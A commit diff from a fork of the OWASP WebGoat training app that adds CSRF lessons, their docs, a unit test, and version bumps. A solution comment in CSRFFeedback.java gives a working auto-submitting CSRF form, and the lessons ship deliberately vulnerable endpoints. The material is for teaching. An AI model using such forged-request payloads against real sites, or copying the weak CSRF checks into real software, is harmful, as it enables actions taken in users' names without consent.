dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge tag '8.0.0' into develop

Browse Source 
Release 8.0.0
This commit is contained in:
nbaars
2017-12-30 16:52:24 +01:00
parent a11e6911cd 114fbc5760
commit 05d8b590f3
114 changed files with 1744 additions and 1060 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
webgoat-lessons/auth-bypass/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
</project>

BIN
webgoat-lessons/auth-bypass/src/main/resources/video/sample-video.m4v
View File

Binary file not shown.

2
webgoat-lessons/bypass-restrictions/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
</project>

2
webgoat-lessons/challenge/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>

2
webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/plugin/challenge7/Assignment7.java
View File

@ -45,7 +45,7 @@ public class Assignment7 extends AssignmentEndpoint {
@Autowired
private RestTemplate restTemplate;
@Value("${webworf.url.mail}")
@Value("${webwolf.url.mail}")
private String webWolfMailURL;
@GetMapping("/reset-password/{link}")

2
webgoat-lessons/client-side-filtering/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
</project>

2
webgoat-lessons/cross-site-scripting/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
<build>
<plugins>

2
webgoat-lessons/csrf/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0-SNAPSHOT</version>
<version>8.0.0.M3</version>
</parent>
</project>

88
webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/plugin/CSRFFeedback.java Normal file
View File

@ -0,0 +1,88 @@
package org.owasp.webgoat.plugin;
import com.fasterxml.jackson.databind.ObjectMapper;
import org.apache.commons.lang3.StringUtils;
import org.apache.commons.lang3.exception.ExceptionUtils;
import org.owasp.webgoat.assignments.AssignmentEndpoint;
import org.owasp.webgoat.assignments.AssignmentHints;
import org.owasp.webgoat.assignments.AssignmentPath;
import org.owasp.webgoat.assignments.AttackResult;
import org.owasp.webgoat.session.UserSessionData;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.MediaType;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import java.io.IOException;
import java.util.Map;
import java.util.UUID;
/**
* @author nbaars
* @since 11/17/17.
*/
@AssignmentPath("/csrf/feedback")
@AssignmentHints({"csrf-feedback-hint1", "csrf-feedback-hint2", "csrf-feedback-hint3"})
public class CSRFFeedback extends AssignmentEndpoint {
@Autowired
private UserSessionData userSessionData;
@Autowired
private ObjectMapper objectMapper;
@PostMapping(value = "/message", produces = {"application/json"})
@ResponseBody
public AttackResult completed(HttpServletRequest request, @RequestBody String feedback) {
try {
objectMapper.readValue(feedback.getBytes(), Map.class);
} catch (IOException e) {
return failed().feedback(ExceptionUtils.getStackTrace(e)).build();
}
boolean correctCSRF = requestContainsWebGoatCookie(request.getCookies()) && request.getContentType().equals(MediaType.TEXT_PLAIN_VALUE);
correctCSRF &= hostOrRefererDifferentHost(request);
if (correctCSRF) {
String flag = UUID.randomUUID().toString();
userSessionData.setValue("csrf-feedback", flag);
return success().feedback("csrf-feedback-success").feedbackArgs(flag).build();
}
return failed().build();
}
@PostMapping(produces = "application/json")
@ResponseBody
public AttackResult flag(@RequestParam("confirmFlagVal") String flag) {
if (flag.equals(userSessionData.getValue("csrf-feedback"))) {
return trackProgress(success().build());
} else {
return trackProgress(failed().build());
}
}
private boolean hostOrRefererDifferentHost(HttpServletRequest request) {
String referer = request.getHeader("referer");
String host = request.getHeader("host");
return !StringUtils.contains(referer, host);
}
private boolean requestContainsWebGoatCookie(Cookie[] cookies) {
if (cookies != null) {
for (Cookie c : cookies) {
if (c.getName().equals("JSESSIONID")) {
return true;
}
}
}
return false;
}
/** Solution
<form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST">
<input type="hidden" name='{"name": "Test", "email": "test1233@dfssdf.de", "subject": "service", "message":"dsaffd"}'>
</form>
<script>document.attack.submit();</script>
*/
}

40
webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/plugin/CSRFLogin.java Normal file
View File

@ -0,0 +1,40 @@
package org.owasp.webgoat.plugin;
import org.owasp.webgoat.assignments.AssignmentEndpoint;
import org.owasp.webgoat.assignments.AssignmentHints;
import org.owasp.webgoat.assignments.AssignmentPath;
import org.owasp.webgoat.assignments.AttackResult;
import org.owasp.webgoat.users.UserTracker;
import org.owasp.webgoat.users.UserTrackerRepository;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.ResponseBody;
/**
* @author nbaars
* @since 11/17/17.
*/
@AssignmentPath("/csrf/login")
@AssignmentHints({"csrf-login-hint1", "csrf-login-hint2", "csrf-login-hint3"})
public class CSRFLogin extends AssignmentEndpoint {
@Autowired
private UserTrackerRepository userTrackerRepository;
@PostMapping(produces = {"application/json"})
@ResponseBody
public AttackResult completed() {
String userName = getWebSession().getUserName();
if (userName.startsWith("csrf")) {
markAssignmentSolvedWithRealUser(userName.substring("csrf-".length()));
return trackProgress(success().feedback("csrf-login-success").build());
}
return trackProgress(failed().feedback("csrf-login-failed").feedbackArgs(userName).build());
}
private void markAssignmentSolvedWithRealUser(String username) {
UserTracker userTracker = userTrackerRepository.findOne(username);
userTracker.assignmentSolved(getWebSession().getCurrentLesson(), this.getClass().getSimpleName());
userTrackerRepository.save(userTracker);
}
}

234
webgoat-lessons/csrf/src/main/resources/html/CSRF.html
View File

@ -2,62 +2,63 @@
<html xmlns:th="http://www.thymeleaf.org">
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_intro.adoc"></div>
</div>
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_intro.adoc"></div>
</div>
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_GET.adoc"></div>
</div>
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_GET.adoc"></div>
</div>
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_Get_Flag.adoc"></div>
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_Get_Flag.adoc"></div>
<form accept-charset="UNKNOWN" id="basic-csrf-get"
method="GET" name="form1"
<form accept-charset="UNKNOWN" id="basic-csrf-get"
method="GET" name="form1"
successCallback=""
action="/WebGoat/csrf/basic-get-flag"
enctype="application/json;charset=UTF-8">
<input name="csrf" type="hidden" value="false"/>
<input type="submit" name="ubmit="/>
</form>
<div class="adoc-content" th:replace="doc:CSRF_Basic_Get-1.adoc"></div>
<div class="attack-container">
<div class="assignment-success">
<i class="fa fa-2 fa-check hidden" aria-hidden="true">
</i>
</div>
<form class="attack-form" accept-charset="UNKNOWN" id="confirm-flag-1"
method="POST" name="form2"
successCallback=""
action="/WebGoat/csrf/basic-get-flag"
action="/WebGoat/csrf/confirm-flag-1"
enctype="application/json;charset=UTF-8">
<input name="csrf" type="hidden" value="false" />
<input type="submit" name="ubmit=" />
Confirm Flag Value:
<input type="text" length="6" name="confirmFlagVal" value=""/>
<input name="submit" value="Submit" type="submit"/>
</form>
<div class="adoc-content" th:replace="doc:CSRF_Basic_Get-1.adoc"></div>
<div class="attack-container">
<div class="assignment-success">
<i class="fa fa-2 fa-check hidden" aria-hidden="true">
</i>
</div>
<form class="attack-form" accept-charset="UNKNOWN" id="confirm-flag-1"
method="POST" name="form2"
successCallback=""
action="/WebGoat/csrf/confirm-flag-1"
enctype="application/json;charset=UTF-8">
Confirm Flag Value:
<input type="text" length="6" name="confirmFlagVal" value="" />
<input name="submit" value="Submit" type="submit"/>
</form>
<div class="attack-feedback"></div>
<div class="attack-output"></div>
</div>
<div class="attack-feedback"></div>
<div class="attack-output"></div>
</div>
</div>
<div class="lesson-page-wrapper">
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_Reviews.adoc"></div>
<div class="adoc-content" th:replace="doc:CSRF_Reviews.adoc"></div>
<!-- comment area -->
<link rel="stylesheet" type="text/css" th:href="@{/lesson_css/reviews.css}"/>
<script th:src="@{/lesson_js/csrf-review.js}" language="JavaScript"></script>
<!-- comment area -->
<link rel="stylesheet" type="text/css" th:href="@{/lesson_css/reviews.css}"/>
<script th:src="@{/lesson_js/csrf-review.js}" language="JavaScript"></script>
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<div class="attack-container">
<div class="container-fluid">
<div class="panel post">
<div class="post-heading">
@ -89,16 +90,17 @@
method="POST" name="review-form"
successCallback=""
action="/WebGoat/csrf/review">
<input class="form-control" id="reviewText" name="reviewText" placeholder="Add a Review" type="text"/>
<input class="form-control" id="reviewStars" name="stars" type="text" />
<input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9" />
<input class="form-control" id="reviewText" name="reviewText" placeholder="Add a Review"
type="text"/>
<input class="form-control" id="reviewStars" name="stars" type="text"/>
<input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9"/>
<input type="submit" name="submit" value="Submit review"/>
</form>
<div class="attack-feedback"></div>
<div class="attack-output"></div>
<!--<span class="input-group-addon">-->
<!--<i id="postReview" class="fa fa-edit" style="font-size: 20px"></i>-->
<!--</span>-->
<!--<i id="postReview" class="fa fa-edit" style="font-size: 20px"></i>-->
<!--</span>-->
</div>
<ul class="comments-list">
<div id="list">
@ -108,14 +110,144 @@
</div>
</div>
</div>
<!-- end comments -->
</div>
<!-- end comments -->
</div>
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_Frameworks.adoc"></div>
</div>
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_JSON.adoc"></div>
</div>
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_ContentType.adoc"></div>
<script th:src="@{/lesson_js/feedback.js}" language="JavaScript"></script>
<div style="container-fluid; background-color: #f1f1f1; border: 2px solid #a66;
border-radius: 12px;
padding: 7px;
margin-top:7px;
padding:5px;">
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<div class="container-fluid">
<div class="row">
<div class="col-md-8">
<div class="well well-sm">
<form class="attack-form" accept-charset="UNKNOWN" id="csrf-feedback"
method="POST"
prepareData="feedback"
action="/WebGoat/csrf/feedback/message"
contentType="application/json">
<div class="row">
<div class="col-md-6">
<div class="form-group">
<label for="name">
Name</label>
<input type="text" class="form-control" name="name" id="name"
placeholder="Enter name"
required="required"/>
</div>
<div class="form-group">
<label for="email">
Email Address</label>
<div class="input-group">
<span class="input-group-addon"><span class="glyphicon glyphicon-envelope"></span>
</span>
<input type="email" name="email" class="form-control" id="email"
placeholder="Enter email"
required="required"/></div>
</div>
<div class="form-group">
<label for="subject">
Subject</label>
<select id="subject" name="subject" class="form-control" required="required">
<option value="na" selected="">Choose One:</option>
<option value="service">General Customer Service</option>
<option value="suggestions">Suggestions</option>
<option value="product">Product Support</option>
</select>
</div>
</div>
<div class="col-md-6">
<div class="form-group">
<label for="name">
Message</label>
<textarea name="message" id="message" class="form-control" rows="9" cols="25"
required="required"
placeholder="Message"></textarea>
</div>
</div>
<div class="col-md-12">
<button class="btn btn-primary pull-right" id="btnContactUs">
Send Message
</button>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_Impact_Defense.adoc"></div>
<div class="attack-container">
<div class="assignment-success">
<i class="fa fa-2 fa-check hidden" aria-hidden="true">
</i>
</div>
<form class="attack-form" accept-charset="UNKNOWN" id="confirm-flag-feedback"
method="POST" name="form2"
action="/WebGoat/csrf/feedback"
enctype="application/json;charset=UTF-8">
Confirm Flag Value:
<input type="text" length="6" name="confirmFlagVal" value=""/>
<input name="submit" value="Submit" type="submit"/>
</form>
<div class="attack-feedback"></div>
<div class="attack-output"></div>
</div>
<!--</div>-->
</div>
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_Login.adoc"></div>
<div class="attack-container">
<div class="assignment-success">
<i class="fa fa-2 fa-check hidden" aria-hidden="true">
</i>
</div>
<form class="attack-form" accept-charset="UNKNOWN" id="confirm-flag-login"
method="POST" name="form2"
action="/WebGoat/csrf/login"
enctype="application/json;charset=UTF-8">
Press the button below when your are logged in as the other user<br/>
<input name="submit" value="Solved!" type="submit"/>
</form>
<div class="attack-feedback"></div>
<div class="attack-output"></div>
</div>
</div>
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:CSRF_Impact_Defense.adoc"></div>
</div>
<!--</div>-->
</html>

15
webgoat-lessons/csrf/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -16,4 +16,17 @@ csrf-review.success=It appears you have submitted correctly from another site. G
csrf-review-hint1=Again, you will need to submit from an external domain/host to trigger this action. While CSRF can often be triggered from the same host (e.g. via persisted payload), this doesn't work that way.
csrf-review-hint2=Remember, you need to mimic the existing workflow/form.
csrf-review-hint3=This one has a weak anti-CSRF protection, but you do need to overcome (mimic) it
csrf-review-hint3=This one has a weak anti-CSRF protection, but you do need to overcome (mimic) it
csrf-feedback-hint1=Look at the content-type.
csrf-feedback-hint2=Try to post the same message with content-type text/plain
csrf-feedback-hint3=The json can be put into a hidden field inside
csrf-feedback-invalid-json=Invalid JSON received.
csrf-feedback-success=Congratulations you have found the correct solution, the flag is: {0}
csrf-login-hint1=First create a new account with csrf-username
csrf-login-hint2=Create a form which will log you in as this user (hint 1) and upload it to WebWolf
csrf-login-hint3=Visit this assignment again
csrf-login-success=Congratulations, now log out and login with your normal user account within WebGoat, remember the attacker knows you solved this assignment
csrf-login-failed=The solution is not correct, you are clicking the button while logged in as {0}

BIN
webgoat-lessons/csrf/src/main/resources/images/login-csrf.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 212 KiB

7
webgoat-lessons/csrf/src/main/resources/js/feedback.js Normal file
View File

@ -0,0 +1,7 @@
webgoat.customjs.feedback = function() {
var data = {};
$('#csrf-feedback').find('input, textarea, select').each(function(i, field) {
data[field.name] = field.value;
});
return JSON.stringify(data);
}

23
webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_ContentType.adoc Normal file
View File

@ -0,0 +1,23 @@
== CSRF and content-type
In the previous section we saw how relying on the content-type is not a protection against
CSRF. In this section we will look into another way we can perform a CSRF attack against
a APIs which are not protected against CSRF.
In this assignment you need to achieve to POST the following JSON message to our endpoints:
[source]
----
POST /csrf/feedback HTTP/1.1
{
"name" : "WebGoat",
"email" : "webgoat@webgoat.org"
"content" : "WebGoat is the best!!"
}
----
More information can be found http://pentestmonkey.net/blog/csrf-xml-post-request[here]
Remember you need to make the call from another origin (WebWolf can help here) and you need to be logged in into
WebGoat.

22
webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Frameworks.adoc Normal file
View File

@ -0,0 +1,22 @@
=== Automatic support from frameworks
Most frameworks now have default support for preventing CSRF. For example with Angular an interceptor reads a token
from a cookie by default XSRF-TOKEN and sets it as an HTTP header, X-XSRF-TOKEN. Since only code that runs on your domain
could read the cookie, the backend can be certain that the HTTP request came from your client application and not an attacker.
In order for this to work the backend server sets the token in a cookie. As the value of the cookie should be read
by Angular (JavaScript) this cookie should not be marked with the http-only flag. On every request towards the server
Angular will put the token in the X-XSRF-TOKEN as a HTTP header. The server can validate whether those two tokens
match and this will ensure the server the request is running on the same domain.
*Important: DEFINE A SEPARATE COOKIE, DO NOT REUSE THE SESSION COOKIE*
Remember the session cookie should always be defined with http-only flag.
Another effective defense can be to add a custom request header to each call. This will work if all the interactions
with the server are performed with JavaScript. On the server side you only need to check the presence of this header
if this header is not present deny the request.

46
webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_JSON.adoc Normal file
View File

@ -0,0 +1,46 @@
**But I only have JSON APIs and no CORS enabled, how can those be susceptible to CSRF?**
A lot of web applications implement no protection against CSRF they are somehow protected by the fact that
they only work with `application/json` as content type. The only way to make a request with this content-type from the
browser is with a XHR request. Before the browser can make such a request a preflight request will be made towards
the server (remember the CSRF request will be cross origin). If the preflight response does not allow the cross origin
request the browser will not make the call.
To make a long answer short: this is *not* a valid protection against CSRF.
One example why this protection is not enough can be found https://bugs.chromium.org/p/chromium/issues/detail?id=490015[here].
Turns out `Navigator.sendBeacon()` was allowed to send POST request with an arbitrary content-type.
[qoute, developer.mozilla.org]
____
The navigator.sendBeacon() method can be used to asynchronously transfer a small amount of
data over HTTP to a web server. This method addresses the needs of analytics and diagnostics
code that typically attempts to send data to a web server prior to the unloading of the
document. Sending the data any sooner may result in a missed opportunity to gather data..."
____
{nbsp} +
For example:
[source]
----
function postBeacon() {
var data= new Blob([JSON.stringify({"author" :"WebGoat"})], {type : 'application/json'});
navigator.sendBeacon("http://localhost:8083", data)
}
----
[quote, Eduardo Vela]
____
I think Content-Type restrictions are useful for websites that are accidentally safe against CSRF. They are not meant to be, but they are because they happen to only accept XML or JSON payloads.
That said, it's somewhat obvious the websites depending on this behavior should be fixed, and any reputable pentesters will point that out. The issue is whether it's the browser responsibility to act as a nanny to weak websites, or we should leave weak websites as sacrifice for great justice. Survival of the fittest.
IMHO, the answer is somewhere in between, and a good first step would be to document all these Same Origin Policy gotchas that websites might depend upon for security.
But wrt to this bug in specific, if it never got fixed, I don't think it would be the end of the world. But then again, on this day and age, maybe there's a way to launch nuclear missiles with a XML RPC interface, so maybe it would be the end of the world.
____
{nbsp} +
Both Firefox and Chrome fixed this issue, but it shows why you should implement a CSRF protection instead
of relying on the content-type of your APIs.

24
webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Login.adoc Normal file
View File

@ -0,0 +1,24 @@
:blank: pass:[ +]
== Login CSRF attack
In a login CSRF attack, the attacker forges a login request to an honest site using the attackers username
and password at that site. If the forgery succeeds, the honest server responds with a `Set-Cookie` header
that instructs the browser to mutate its state by storing a session cookie, logging the user into
the honest site as the attacker. This session cookie is used to bind subsequent requests to the users session and hence
to the attackers authentication credentials. Login CSRF attacks can have serious consequences, for example
see the picture below where an attacker created an account at google.com the victim visits the malicious
website and the user is logged in as the attacker. The attacker could then later on gather information about
the activities of the user.
{blank}
image::images/login-csrf.png[caption="Figure: ", title="Login CSRF from Robust Defenses for Cross-Site Request Forgery", width="800", height="500", style="lesson-image" link="http://seclab.stanford.edu/websec/csrf/csrf.pdf"]
{blank}
For more information read the following http://seclab.stanford.edu/websec/csrf/csrf.pdf[paper]
In this assignment try to see if WebGoat is also vulnerable for a login CSRF attack. First create a user
based on your own username prefixed with csrf. So if your username is `tom` you must create
a new user called `csrf-tom`

4
webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_Reviews.adoc
View File

@ -1,9 +1,9 @@
== Post a review on someone else's behalf
The page below simulates a comment/review page. The difference here is that you have to inititate the submission elsewhere as you might
The page below simulates a comment/review page. The difference here is that you have to initiate the submission elsewhere as you might
with a CSRF attack and like the previous exercise. It's easier than you think. In most cases, the trickier part is
finding somewhere that you want to execute the CSRF attack. The classic example is account/wire transfers in someone's bank account.
But we're keepoing it simple here. In this case, you just need to trigger a review submission on behalf of the currently
But we're keeping it simple here. In this case, you just need to trigger a review submission on behalf of the currently
logged in user.

58
webgoat-lessons/csrf/src/test/java/org/owasp/webgoat/plugin/CSRFFeedbackTest.java Normal file
View File

@ -0,0 +1,58 @@
package org.owasp.webgoat.plugin;
import org.hamcrest.core.StringContains;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.owasp.webgoat.plugins.LessonTest;
import org.springframework.http.MediaType;
import org.springframework.test.context.junit4.SpringJUnit4ClassRunner;
import org.springframework.test.web.servlet.setup.MockMvcBuilders;
import javax.servlet.http.Cookie;
import static org.hamcrest.core.Is.is;
import static org.mockito.Mockito.when;
import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.post;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
/**
* @author nbaars
* @since 11/17/17.
*/
@RunWith(SpringJUnit4ClassRunner.class)
public class CSRFFeedbackTest extends LessonTest {
@Before
public void setup() throws Exception {
CSRF csrf = new CSRF();
when(webSession.getCurrentLesson()).thenReturn(csrf);
this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
when(webSession.getUserName()).thenReturn("unit-test");
}
@Test
public void postingJsonMessageThroughWebGoatShouldWork() throws Exception {
mockMvc.perform(post("/csrf/feedback/message")
.contentType(MediaType.APPLICATION_JSON)
.content("{\"name\": \"Test\", \"email\": \"test1233@dfssdf.de\", \"subject\": \"service\", \"message\":\"dsaffd\"}"))
.andExpect(status().isOk());
}
@Test
public void csrfAttack() throws Exception {
mockMvc.perform(post("/csrf/feedback/message")
.contentType(MediaType.TEXT_PLAIN)
.cookie(new Cookie("JSESSIONID", "test"))
.header("host", "localhost:8080")
.header("referer", "webgoat.org")
.content("{\"name\": \"Test\", \"email\": \"test1233@dfssdf.de\", \"subject\": \"service\", \"message\":\"dsaffd\"}"))
.andExpect(jsonPath("lessonCompleted", is(true)))
.andExpect(jsonPath("feedback", StringContains.containsString("the flag is: ")));
}
}

55
webgoat-lessons/csrf/webgoat-lesson-template/getting-started.txt
View File

@ -1,55 +0,0 @@
##### To include lesson template in build #####
1. edit theh webgoat-server/pom.xml file and uncomment the section under ...
<!--uncommment below to run/include lesson template in WebGoat Build-->
2. Also uncomment in webgoat-lessons/pom.xml where it says ...
<!-- uncomment below to include lesson template in build, also uncomment the dependency in webgoat-server/pom.xml-->
##### To add a lesson to WebGoat #####
There are a number of moving parts and this sample lesson will help you navigate those parts. Most of your work will be done in two directories. To start though, you can copy this directory with the name of your-lesson in the webgoat-lessons directory.
0. The POM file
a. change the ...
<artifactId>webgoat-lesson-template</artifactId>
... line to give your lesson its own artifactId.That should be all you need to do there
1. The Base Class ...
In webgoat-lessons/{your-lesson}/src/main/java, refactor the LessonTemplate.java class, changing ...
a. the category in which you want your lesson to be in. You can create a new category if you want, or put in an issue to have one added
b. The 'defaultRanking' will move your lesson up or down in the categories list
c. implement a new key name pair "lesson-template.title" (the key) and update the same key/value pair (your.key=your value) in src/main/resources/i18n/WebGoatLabels.properties
d. Implement a new value for the getId method, which leads us to ...
2. The HTML content framing ...
a. Rename the provided file in src/main/resources/html using your value from the getId method in your lesson's base class (e.g. public String getId() { return "your-lesson"; } >> "your-lesson.html")
b. Modify that file following the commented instructions in there
c. In conjunction with this file you
3. Assignment Endpoints
a. In the above html file, you will see an example of an 'attack form'. You can create endpoints to handle these attacks and provide the user feedback and simulated output. See the example file here as well as other existing lessons for ways to extend these. You will extend the AssignmentEndpoint as the example will show
b. You can also create supporting (non-assignment) endpoints, that are not evaluated/graded.
c. See other lesson examples for creating unit/integration tests for your project as well
4. Getting your lesson to show up
a. modify the webgoat-lessons/pom.xml to include your project in the <modules> section
<modules>
<!-- ... -->
<module>webgoat-lesson-template</module>
<!-- ... -->
</modules>
b. modify the webgoat-server/pom.xml to add your project as a dependency in the <dependencies> section ...
<dependencies>
<!-- .... >
<dependency>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>your-artfifact-id-here</artifactId>
<version>${project.version}</version>
</dependency>
<!-- .... >
<dependencies>
5. You should be ready to run and test your project. Please create issues at https://github.com/WebGoat/WebGoat if there errors or confusion with this documentation/template

62
webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/org/owasp/webgoat/plugin/SampleAttack.java
View File

@ -1,62 +0,0 @@
package org.owasp.webgoat.plugin;
import com.google.common.collect.Lists;
import org.owasp.webgoat.assignments.AssignmentEndpoint;
import org.owasp.webgoat.assignments.AssignmentPath;
import org.owasp.webgoat.assignments.AttackResult;
import org.owasp.webgoat.session.UserSessionData;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.ResponseBody;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
/**
* Created by jason on 1/5/17.
*/
@AssignmentPath("/lesson-template/sample-attack")
public class SampleAttack extends AssignmentEndpoint {
String secretValue = "secr37Value";
//UserSessionData is bound to session and can be used to persist data across multiple assignments
@Autowired
UserSessionData userSessionData;
@GetMapping(produces = {"application/json"})
public @ResponseBody
AttackResult completed(String param1, String param2, HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
if (userSessionData.getValue("some-value") != null) {
// do any session updating you want here ... or not, just comment/example here
//return trackProgress(failed().feedback("lesson-template.sample-attack.failure-2").build());
}
//overly simple example for success. See other existing lesssons for ways to detect 'success' or 'failure'
if (secretValue.equals(param1)) {
return trackProgress(success()
.output("Custom Output ...if you want, for success")
.feedback("lesson-template.sample-attack.success")
.build());
//lesson-template.sample-attack.success is defined in src/main/resources/i18n/WebGoatLabels.properties
}
// else
return trackProgress(failed()
.feedback("lesson-template.sample-attack.failure-2")
.output("Custom output for this failure scenario, usually html that will get rendered directly ... yes, you can self-xss if you want")
.build());
}
}

54
webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/html/LessonTemplate.html
View File

@ -1,54 +0,0 @@
<html xmlns:th="http://www.thymeleaf.org">
<div class="lesson-page-wrapper">
<!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
which go in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
<div class="adoc-content" th:replace="doc:lesson-template-intro.adoc"></div>
</div>
<div class="lesson-page-wrapper">
<!-- reuse the above lesson-page-wrapper block for each 'page' of content in your lesson -->
<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
<div class="adoc-content" th:replace="doc:lesson-template-video.adoc"></div>
<!-- can use multiple adoc's in a page-wrapper if you want ... or not-->
<div class="adoc-content" th:replace="doc:lesson-template-attack.adoc"></div>
<!-- WebGoat will automatically style and scaffold some functionality by using the div.attack-container as below -->
<div class="attack-container">
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
<!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
<!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
<!-- modify the action to point to the intended endpoint and set other attributes as desired -->
<script th:src="@{/lesson_js/idor.js}" />
<form class="attack-form" accept-charset="UNKNOWN"
method="GET" name="form"
action="/WebGoat/lesson-template/sample-attack"
enctype="application/json;charset=UTF-8">
<table>
<tr>
<td>two random params</td>
<td>parameter 1:<input name="param1" value="" type="TEXT" /></td>
<td>parameter 2:<input name="param2" value="" type="TEXT" /></td>
<td>
<input
name="submit" value="Submit" type="SUBMIT"/>
</td>
</tr>
</table>
</form>
<!-- do not remove the two following div's, this is where your feedback/output will land -->
<!-- the attack response will include a 'feedback' and that will automatically go here -->
<div class="attack-feedback"></div>
<!-- output is intended to be a simulation of what the screen would display in an attack -->
<div class="attack-output"></div>
</div>
</div>
<!-- repeat and mix-and-match the lesson-page-wrappers with or wihtout the attack-containers as you like ...
see other lessons for other more complex examples -->
</html>

7
webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -1,7 +0,0 @@
lesson-template.title=Lesson Template
lesson-template.sample-attack.failure-1=Sample failure message
lesson-template.sample-attack.failure-2=Sample failure message 2
lesson-template.sample-attack.success=Sample success message

BIN
webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/images/firefox-proxy-config.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 200 KiB

18
webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/js/idor.js
View File

@ -1,18 +0,0 @@
// need custom js for this?
webgoat.customjs.idorViewProfile = function(data) {
webgoat.customjs.jquery('#idor-profile').html(
'name:' + data.name + '<br/>'+
'color:' + data.color + '<br/>'+
'size:' + data.size + '<br/>'
);
}
var onViewProfile = function () {
console.warn("on view profile activated")
webgoat.customjs.jquery.ajax({
method: "GET",
url: "/WebGoat/IDOR/profile",
contentType: 'application/json; charset=UTF-8'
}).then(webgoat.customjs.idorViewProfile);
